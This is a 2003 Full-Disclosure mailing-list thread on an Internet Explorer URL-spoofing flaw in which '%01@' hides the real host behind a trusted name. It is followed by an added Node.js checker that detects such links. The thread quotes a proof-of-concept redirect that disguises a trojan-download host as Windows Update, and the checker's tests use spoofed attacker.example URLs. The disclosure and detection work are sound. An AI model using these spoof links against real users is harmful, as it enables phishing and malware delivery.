Message-ID: <20031209190051.79509.qmail@web60802.mail.yahoo.com>
From: sgmasood at yahoo.com (S G Masood)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability
--- Exibar <exibar@...lair.com> wrote:
> my favorite will be this one that I'm sure will
> circulate:
>
> http://www.microsoft.com%01@....linux.org
>
> :-)
http://www.microsoft.com%01@....linux.org
won't work until you
unescape('http://www.microsoft.com%01@....linux.org');
>
> ----- Original Message -----
> From: "S G Masood" <sgmasood@...oo.com>
> To: <full-disclosure@...ts.netsys.com>
> Sent: Tuesday, December 09, 2003 1:22 PM
> Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>
>
> >
> > LOL. This is so simple and dangerous, it almost made
> > me laugh and cry at the same time. Most of you will
> > realise why...;D
> > The Paypal, AOL, Visa, Mastercard, et al email
> > scammers will have a harvest of gold this month with
> > lots of zombies falling for this simple technique.
> >
> > ># POC ##########
> >
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
> >
> > Don't be surprised if your latest download from
> > http://www.microsoft.com turns out to be a trojan!
> >
> >
> > location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');
> >
> >
> > --
> > S.G.Masood
> >
> > Hyderabad,
> > India
> >
> > PS: One more thing - no scripting required to exploit this.
> >
> > __________________________________
> > Do you Yahoo!?
> > Free Pop-Up Blocker - Get it now
> > http://companion.yahoo.com/
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
>
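An added defensive example, not part of the original thread: a Node.js link check for mail or proxy filtering that flags the pattern in the URLs above, where a trusted-looking name and a control byte (escaped as %01 or already unescaped) sit in the userinfo before "@" and the real host follows it. It also flags host-looking userinfo without a control byte, which goes slightly beyond the case in the thread; `inspectLink`, the `.example` hosts and the sample links are assumptions constructed for illustration.

```javascript
// Added example (not from the original thread). Hosts under .example are
// placeholders and the sample links are constructed for illustration.
const CONTROL = /[\x00-\x1f\x7f]/;
const HOSTLIKE = /^(?:[a-z0-9-]+\.)+[a-z]{2,}$/i;

// Decode %XX escapes; fall back to the raw text on a malformed escape.
function decode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

function inspectLink(raw) {
  let url;
  try {
    url = new URL(raw);
  } catch {
    return { host: null, reasons: ['unparseable'] };
  }
  const reasons = [];
  // The WHATWG parser percent-encodes raw control bytes in userinfo, so
  // decoding here covers both the "%01" form and the unescape()d form.
  const user = decode(url.username);
  const pass = decode(url.password);
  if (CONTROL.test(user) || CONTROL.test(pass)) {
    reasons.push('control character in userinfo');
  }
  // Text before the first control byte, or the whole username if none.
  const shown = user.split(CONTROL)[0];
  if (HOSTLIKE.test(shown) && shown.toLowerCase() !== url.hostname) {
    reasons.push('userinfo looks like host ' + shown);
  }
  return { host: url.hostname, reasons };
}

const samples = [
  'http://www.microsoft.com%01@attacker.example/update.exe',
  'http://www.microsoft.com\x01@attacker.example/update.exe',
  'http://www.paypal.com@attacker.example/login',
  'ftp://backup@files.example/daily.tar',
  'https://www.microsoft.com/download',
];
for (const s of samples) {
  const r = inspectLink(s);
  console.log(JSON.stringify(s), '->', r.host, r.reasons);
}
```

The `host` field is the name the connection would actually go to, so a filter can log or display it next to any flagged link.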